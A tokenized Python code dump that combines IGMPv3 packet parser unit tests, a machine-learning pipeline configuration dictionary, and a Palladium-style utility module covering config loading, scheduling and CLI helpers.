buf += self . record1 . serialize ( ) <EOL> self . buf += self . record2 . serialize ( ) <EOL> self . buf += self . record3 . serialize ( ) <EOL> self . buf += self . record4 . serialize ( ) <EOL> self . g = igmpv3_report ( <EOL> self . msgtype , self . csum , self . record_num , self . records ) <EOL> self . test_parser ( ) <EOL> @ raises ( Exception ) <EOL> def test_record_num_smaller_than_records ( self ) : <EOL> self . record1 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> self . record2 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> self . record3 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:0> , '<STR_LIT>' , [ ] , b'<STR_LIT>' ) <EOL> self . record4 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> self . records = [ self . record1 , self . record2 , self . 
record3 , <EOL> self . record4 ] <EOL> self . record_num = len ( self . records ) - <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report . _PACK_STR , self . msgtype , <EOL> self . csum , self . record_num ) <EOL> self . buf += self . record1 . serialize ( ) <EOL> self . buf += self . record2 . serialize ( ) <EOL> self . buf += self . record3 . serialize ( ) <EOL> self . buf += self . record4 . serialize ( ) <EOL> self . g = igmpv3_report ( <EOL> self . msgtype , self . csum , self . record_num , self . records ) <EOL> self . test_parser ( ) <EOL> def test_default_args ( self ) : <EOL> prev = ipv4 ( proto = inet . IPPROTO_IGMP ) <EOL> g = igmpv3_report ( ) <EOL> prev . serialize ( g , None ) <EOL> buf = g . serialize ( bytearray ( ) , prev ) <EOL> res = unpack_from ( igmpv3_report . _PACK_STR , six . binary_type ( buf ) ) <EOL> buf = bytearray ( buf ) <EOL> pack_into ( '<STR_LIT>' , buf , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , IGMP_TYPE_REPORT_V3 ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , checksum ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , <NUM_LIT:0> ) <EOL> prev = ipv4 ( proto = inet . IPPROTO_IGMP ) <EOL> record1 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:0> , '<STR_LIT>' ) <EOL> record2 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:0> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> record3 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:0> , '<STR_LIT>' , [ ] , b'<STR_LIT>' ) <EOL> record4 = igmpv3_report_group ( <EOL> MODE_IS_INCLUDE , <NUM_LIT:1> , <NUM_LIT:2> , '<STR_LIT>' , <EOL> [ '<STR_LIT>' , '<STR_LIT>' ] , b'<STR_LIT>' ) <EOL> records = [ record1 , record2 , record3 , record4 ] <EOL> g = igmpv3_report ( records = records ) <EOL> prev . serialize ( g , None ) <EOL> buf = g . serialize ( bytearray ( ) , prev ) <EOL> res = unpack_from ( igmpv3_report . _PACK_STR , six . 
binary_type ( buf ) ) <EOL> buf = bytearray ( buf ) <EOL> pack_into ( '<STR_LIT>' , buf , <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , IGMP_TYPE_REPORT_V3 ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , checksum ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , len ( records ) ) <EOL> def test_json ( self ) : <EOL> jsondict = self . g . to_jsondict ( ) <EOL> g = igmpv3_report . from_jsondict ( jsondict [ '<STR_LIT>' ] ) <EOL> eq_ ( str ( self . g ) , str ( g ) ) <EOL> def test_json_with_records ( self ) : <EOL> self . setUp_with_records ( ) <EOL> self . test_json ( ) <EOL> class Test_igmpv3_report_group ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . type_ = MODE_IS_INCLUDE <EOL> self . aux_len = <NUM_LIT:0> <EOL> self . num = <NUM_LIT:0> <EOL> self . address = '<STR_LIT>' <EOL> self . srcs = [ ] <EOL> self . aux = None <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> def setUp_with_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> def setUp_with_aux ( self ) : <EOL> self . aux = b'<STR_LIT>' <EOL> self . aux_len = len ( self . aux ) // <NUM_LIT:4> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . 
text_to_bin ( self . address ) ) <EOL> self . buf += self . aux <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> def setUp_with_srcs_and_aux ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) <EOL> self . aux = b'<STR_LIT>' <EOL> self . aux_len = len ( self . aux ) // <NUM_LIT:4> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . buf += self . aux <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> def tearDown ( self ) : <EOL> pass <EOL> def test_init ( self ) : <EOL> eq_ ( self . type_ , self . g . type_ ) <EOL> eq_ ( self . aux_len , self . g . aux_len ) <EOL> eq_ ( self . num , self . g . num ) <EOL> eq_ ( self . address , self . g . address ) <EOL> eq_ ( self . srcs , self . g . srcs ) <EOL> eq_ ( self . aux , self . g . aux ) <EOL> def test_init_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_init ( ) <EOL> def test_init_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> self . test_init ( ) <EOL> def test_init_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> self . test_init ( ) <EOL> def test_parser ( self ) : <EOL> _res = self . g . parser ( self . buf ) <EOL> if type ( _res ) is tuple : <EOL> res = _res [ <NUM_LIT:0> ] <EOL> else : <EOL> res = _res <EOL> eq_ ( res . type_ , self . type_ ) <EOL> eq_ ( res . aux_len , self . aux_len ) <EOL> eq_ ( res . num , self . num ) <EOL> eq_ ( res . address , self . address ) <EOL> eq_ ( res . srcs , self . srcs ) <EOL> eq_ ( res . aux , self . 
aux ) <EOL> def test_parser_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . test_parser ( ) <EOL> def test_parser_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> self . test_parser ( ) <EOL> def test_parser_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> self . test_parser ( ) <EOL> def test_serialize ( self ) : <EOL> buf = self . g . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . type_ ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . aux_len ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . num ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> def test_serialize_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> buf = self . g . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> ( src1 , src2 , src3 ) = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . type_ ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . aux_len ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . num ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( src1 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( src2 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( src3 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:2> ] ) ) <EOL> def test_serialize_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> buf = self . g . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> ( aux , ) = unpack_from ( '<STR_LIT>' % ( self . aux_len * <NUM_LIT:4> ) , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . type_ ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . 
aux_len ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . num ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( aux , self . aux ) <EOL> def test_serialize_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> buf = self . g . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> ( src1 , src2 , src3 ) = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN ) <EOL> ( aux , ) = unpack_from ( '<STR_LIT>' % ( self . aux_len * <NUM_LIT:4> ) , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN + <NUM_LIT:12> ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , self . type_ ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , self . aux_len ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , self . num ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> eq_ ( src1 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( src2 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( src3 , addrconv . ipv4 . text_to_bin ( self . srcs [ <NUM_LIT:2> ] ) ) <EOL> eq_ ( aux , self . aux ) <EOL> def test_to_string ( self ) : <EOL> igmp_values = { '<STR_LIT>' : repr ( self . type_ ) , <EOL> '<STR_LIT>' : repr ( self . aux_len ) , <EOL> '<STR_LIT>' : repr ( self . num ) , <EOL> '<STR_LIT:address>' : repr ( self . address ) , <EOL> '<STR_LIT>' : repr ( self . srcs ) , <EOL> '<STR_LIT>' : repr ( self . aux ) } <EOL> _g_str = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' % ( k , igmp_values [ k ] ) <EOL> for k , v in inspect . getmembers ( self . g ) <EOL> if k in igmp_values ] ) <EOL> g_str = '<STR_LIT>' % ( igmpv3_report_group . __name__ , _g_str ) <EOL> eq_ ( str ( self . g ) , g_str ) <EOL> eq_ ( repr ( self . g ) , g_str ) <EOL> def test_to_string_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> self . 
test_to_string ( ) <EOL> def test_to_string_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> self . test_to_string ( ) <EOL> def test_to_string_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> self . test_to_string ( ) <EOL> def test_len ( self ) : <EOL> eq_ ( len ( self . g ) , <NUM_LIT:8> ) <EOL> def test_len_with_srcs ( self ) : <EOL> self . setUp_with_srcs ( ) <EOL> eq_ ( len ( self . g ) , <NUM_LIT:20> ) <EOL> def test_len_with_aux ( self ) : <EOL> self . setUp_with_aux ( ) <EOL> eq_ ( len ( self . g ) , <NUM_LIT:16> ) <EOL> def test_len_with_srcs_and_aux ( self ) : <EOL> self . setUp_with_srcs_and_aux ( ) <EOL> eq_ ( len ( self . g ) , <NUM_LIT> ) <EOL> @ raises <EOL> def test_num_larger_than_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) + <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> self . test_parser ( ) <EOL> @ raises <EOL> def test_num_smaller_than_srcs ( self ) : <EOL> self . srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . num = len ( self . srcs ) - <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> for src in self . srcs : <EOL> self . buf += pack ( '<STR_LIT>' , addrconv . ipv4 . text_to_bin ( src ) ) <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> self . 
test_parser ( ) <EOL> @ raises <EOL> def test_aux_len_larger_than_aux ( self ) : <EOL> self . aux = b'<STR_LIT>' <EOL> self . aux_len = len ( self . aux ) // <NUM_LIT:4> + <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . buf += self . aux <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> self . test_parser ( ) <EOL> @ raises <EOL> def test_aux_len_smaller_than_aux ( self ) : <EOL> self . aux = b'<STR_LIT>' <EOL> self . aux_len = len ( self . aux ) // <NUM_LIT:4> - <NUM_LIT:1> <EOL> self . buf = pack ( igmpv3_report_group . _PACK_STR , self . type_ , <EOL> self . aux_len , self . num , <EOL> addrconv . ipv4 . text_to_bin ( self . address ) ) <EOL> self . buf += self . aux <EOL> self . g = igmpv3_report_group ( <EOL> self . type_ , self . aux_len , self . num , self . address , <EOL> self . srcs , self . aux ) <EOL> self . test_parser ( ) <EOL> def test_default_args ( self ) : <EOL> rep = igmpv3_report_group ( ) <EOL> buf = rep . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> srcs = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> rep = igmpv3_report_group ( srcs = srcs ) <EOL> buf = rep . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , len ( srcs ) ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . 
text_to_bin ( '<STR_LIT>' ) ) <EOL> res = unpack_from ( '<STR_LIT>' , six . binary_type ( buf ) , <EOL> igmpv3_report_group . _MIN_LEN ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:0> ] ) ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:1> ] ) ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , addrconv . ipv4 . text_to_bin ( srcs [ <NUM_LIT:2> ] ) ) <EOL> aux = b'<STR_LIT>' <EOL> rep = igmpv3_report_group ( aux = aux ) <EOL> buf = rep . serialize ( ) <EOL> res = unpack_from ( igmpv3_report_group . _PACK_STR , six . binary_type ( buf ) ) <EOL> eq_ ( res [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:1> ] , <NUM_LIT:2> ) <EOL> eq_ ( res [ <NUM_LIT:2> ] , <NUM_LIT:0> ) <EOL> eq_ ( res [ <NUM_LIT:3> ] , addrconv . ipv4 . text_to_bin ( '<STR_LIT>' ) ) <EOL> eq_ ( buf [ igmpv3_report_group . _MIN_LEN : ] , b'<STR_LIT>' ) </s>
<s> </s>
<s> { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:U+002C>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:path>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:U+002C>' , <EOL> '<STR_LIT>' : <NUM_LIT:100> , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:C>' : <NUM_LIT> , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:C>' : [ <NUM_LIT:0.1> , <NUM_LIT> , <NUM_LIT:1.0> ] , <EOL> } , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , '<STR_LIT:float>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:float>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:float>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:float>' ) , <EOL> ] , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , ) , <EOL> } , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> from collections import UserDict <EOL> from contextlib import contextmanager <EOL> from datetime import datetime <EOL> from functools import partial <EOL> from functools import wraps <EOL> import logging <EOL> from logging . config import dictConfig <EOL> from importlib import import_module <EOL> from inspect import signature <EOL> from inspect import getcallargs <EOL> import os <EOL> import sys <EOL> from threading import Thread <EOL> from time import sleep <EOL> from time import time <EOL> import dateutil . parser <EOL> import dateutil . rrule <EOL> from docopt import docopt <EOL> import psutil <EOL> from . import __version__ <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> PALLADIUM_CONFIG_ERROR = """<STR_LIT>""" <EOL> def resolve_dotted_name ( dotted_name ) : <EOL> if '<STR_LIT::>' in dotted_name : <EOL> module , name = dotted_name . split ( '<STR_LIT::>' ) <EOL> else : <EOL> module , name = dotted_name . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> attr = import_module ( module ) <EOL> for name in name . split ( '<STR_LIT:.>' ) : <EOL> attr = getattr ( attr , name ) <EOL> return attr <EOL> def create_component ( specification ) : <EOL> specification = specification . copy ( ) <EOL> factory_dotted_name = specification . pop ( '<STR_LIT>' ) <EOL> factory = resolve_dotted_name ( factory_dotted_name ) <EOL> return factory ( ** specification ) <EOL> class Config ( dict ) : <EOL> """<STR_LIT>""" <EOL> initialized = False <EOL> def __getitem__ ( self , name ) : <EOL> try : <EOL> return super ( Config , self ) . __getitem__ ( name ) <EOL> except KeyError : <EOL> raise KeyError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" . format ( name , PALLADIUM_CONFIG_ERROR ) ) <EOL> _config = Config ( ) <EOL> def get_config ( ** extra ) : <EOL> if not _config . initialized : <EOL> _config . update ( extra ) <EOL> _config . initialized = True <EOL> fname = os . environ . get ( '<STR_LIT>' ) <EOL> if fname is not None : <EOL> sys . path . 
insert ( <NUM_LIT:0> , os . path . dirname ( fname ) ) <EOL> with open ( fname ) as f : <EOL> _config . update ( <EOL> eval ( f . read ( ) , { '<STR_LIT>' : os . environ } ) <EOL> ) <EOL> _initialize_config ( _config ) <EOL> return _config <EOL> def initialize_config ( ** extra ) : <EOL> if _config . initialized : <EOL> raise RuntimeError ( "<STR_LIT>" ) <EOL> return get_config ( ** extra ) <EOL> def _initialize_config_recursive ( mapping ) : <EOL> rv = [ ] <EOL> for key , value in tuple ( mapping . items ( ) ) : <EOL> if isinstance ( value , dict ) : <EOL> rv . extend ( _initialize_config_recursive ( value ) ) <EOL> if '<STR_LIT>' in value : <EOL> mapping [ key ] = create_component ( value ) <EOL> rv . append ( mapping [ key ] ) <EOL> elif isinstance ( value , ( list , tuple ) ) : <EOL> for i , item in enumerate ( value ) : <EOL> if isinstance ( item , dict ) : <EOL> rv . extend ( _initialize_config_recursive ( item ) ) <EOL> if '<STR_LIT>' in item : <EOL> value [ i ] = create_component ( item ) <EOL> rv . append ( value [ i ] ) <EOL> return rv <EOL> def _initialize_config ( config ) : <EOL> components = [ ] <EOL> if '<STR_LIT>' in config : <EOL> dictConfig ( config [ '<STR_LIT>' ] ) <EOL> else : <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> components = _initialize_config_recursive ( config ) <EOL> for component in components : <EOL> if hasattr ( component , '<STR_LIT>' ) : <EOL> component . initialize_component ( config ) <EOL> return config <EOL> def apply_kwargs ( func , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> new_kwargs = { } <EOL> params = signature ( func ) . parameters <EOL> for param_name in params . keys ( ) : <EOL> if param_name in kwargs : <EOL> new_kwargs [ param_name ] = kwargs [ param_name ] <EOL> return func ( ** new_kwargs ) <EOL> def args_from_config ( func ) : <EOL> """<STR_LIT>""" <EOL> func_args = signature ( func ) . 
parameters  # NOTE(review): tail of a truncated statement (enclosing decorator def starts before this chunk)
    # Wrapper injects missing keyword arguments from the global config before
    # calling the decorated function (part of an args-from-config decorator).
    @wraps(func)
    def wrapper(*args, **kwargs):
        config = get_config()
        for i, argname in enumerate(func_args):
            # Skip parameters already supplied positionally or by keyword.
            if len(args) > i or argname in kwargs:
                continue
            elif argname in config:
                kwargs[argname] = config[argname]
        try:
            # Validate the final call signature early for a clearer error.
            getcallargs(func, *args, **kwargs)
        except TypeError as exc:
            msg = "<STR_LIT>".format(exc.args[<NUM_LIT:0>], PALLADIUM_CONFIG_ERROR)
            exc.args = (msg,)
            raise exc
        return func(*args, **kwargs)
    wrapper.__wrapped__ = func
    return wrapper


@contextmanager
def timer(log=None, message=None):
    # Context manager measuring wall-clock duration of the managed block.
    # Yields a dict that receives the elapsed time on exit; optionally logs
    # start/end messages through the supplied `log` callable.
    if log is not None:
        log("<STR_LIT>".format(message))
    info = {}
    t0 = time()
    yield info
    info['<STR_LIT>'] = time() - t0
    if log is not None:
        log("<STR_LIT>".format(message, info['<STR_LIT>']))


@contextmanager
def session_scope(session):
    """<STR_LIT>"""
    # Commit on success, roll back on any exception, always close.
    try:
        yield session
        session.commit()
    except:
        session.rollback()
        raise
    finally:
        session.close()


class ProcessStore(UserDict):
    # Dict-like store that records a modification timestamp per key.
    def __init__(self, *args, **kwargs):
        self.mtime = {}  # key -> datetime of last assignment
        super(ProcessStore, self).__init__(*args, **kwargs)

    def __setitem__(self, key, item):
        super(ProcessStore, self).__setitem__(key, item)
        self.mtime[key] = datetime.now()

    def __getitem__(self, key):
        return super(ProcessStore, self).__getitem__(key)

    def __delitem__(self, key):
        super(ProcessStore, self).__delitem__(key)
        # Keep the timestamp map in sync with the stored keys.
        del self.mtime[key]


# Module-level singleton store shared by the process.
process_store = ProcessStore()


class RruleThread(Thread):
    """<STR_LIT>"""
    def __init__(self, func, rrule, sleep_between_checks=<NUM_LIT>):
        """<STR_LIT>"""
        super(RruleThread, self).__init__(daemon=True)
        # Accept either an rrule object or a dict description of one.
        if isinstance(rrule, dict):
            rrule = self._rrule_from_dict(rrule)
        self.func = func
        self.rrule = rrule
        self.sleep_between_checks = sleep_between_checks
        self.last_execution = datetime.now()
        self.alive = True  # cleared externally to stop the run loop

    @classmethod
    def _rrule_from_dict(cls, rrule):
        # Translate string values naming dateutil.rrule attributes (e.g.
        # frequency constants) and parse the start date if given as a string.
        kwargs = rrule.copy()
        for key, value in rrule.items():
            if isinstance(value, str) and hasattr(dateutil.rrule, value):
                kwargs[key] = getattr(dateutil.rrule, value)
        dstart = kwargs.get('<STR_LIT>')
        if isinstance(dstart, str):
            kwargs['<STR_LIT>'] = dateutil.parser.parse(dstart)
        return dateutil.rrule.rrule(**kwargs)

    def run(self):
        # Poll the recurrence rule; invoke func whenever an occurrence falls
        # between the last execution time and now.
        while self.alive:
            now = datetime.now()
            if not self.rrule.between(self.last_execution, now):
                sleep(self.sleep_between_checks)
                continue
            self.last_execution = now
            try:
                self.func()
            except:
                # Keep the scheduler thread alive on callback failure.
                logger.exception(
                    "<STR_LIT>".format(self.func.__name__))


def memory_usage_psutil():
    """<STR_LIT>"""
    # Returns (RSS, VMS) of the current process in MiB.
    process = psutil.Process(os.getpid())
    mem = process.memory_info()[<NUM_LIT:0>] / float(<NUM_LIT:2> ** <NUM_LIT:20>)
    mem_vms = process.memory_info()[<NUM_LIT:1>] / float(<NUM_LIT:2> ** <NUM_LIT:20>)
    return mem, mem_vms


def version_cmd(argv=sys.argv[<NUM_LIT:1>:]):
    """<STR_LIT>"""
    # NOTE: the docstring doubles as the docopt usage spec — do not edit it
    # without updating the CLI contract.
    docopt(version_cmd.__doc__, argv=argv)
    print(__version__)


@args_from_config
def upgrade(model_persister, from_version=None, to_version=None):
    # Delegate to the persister's upgrade; only pass to_version when given
    # so the persister's own default applies otherwise.
    kwargs = {'<STR_LIT>': from_version}
    if to_version is not None:
        kwargs['<STR_LIT>'] = to_version
    model_persister.upgrade(**kwargs)


def upgrade_cmd(argv=sys.argv[<NUM_LIT:1>:]):
    """<STR_LIT>"""
    # Docstring is the docopt usage spec (see version_cmd).
    arguments = docopt(upgrade_cmd.__doc__, argv=argv)
    initialize_config(__mode__='<STR_LIT>')
    upgrade(from_version=arguments['<STR_LIT>'],
            to_version=arguments['<STR_LIT>'])


class PluggableDecorator:
    # Decorator whose actual wrapping chain is looked up lazily from config
    # (by `decorator_config_name`) on first call, then cached in self.wrapped.
    def __init__(self, decorator_config_name):
        self.decorator_config_name = decorator_config_name
        self.wrapped = None  # lazily-built decorated callable

    def __call__(self, func):
        self.func = func

        def wrapper(*args, **kwargs):
            if self.wrapped is None:
                func = self.func
                decorators = get_config().get(
                    self.decorator_config_name, [])
                # Dotted names in config are resolved to callables.
                self.decorators = [
                    resolve_dotted_name(dec) if isinstance(dec, str) else dec
                    for dec in decorators
                ]
                orig_func = func
                for decorator in self.decorators:
                    func = decorator(func)
                if self.decorators:
                    self.wrapped = wraps(orig_func)(func)
                else:
                    self.wrapped = orig_func
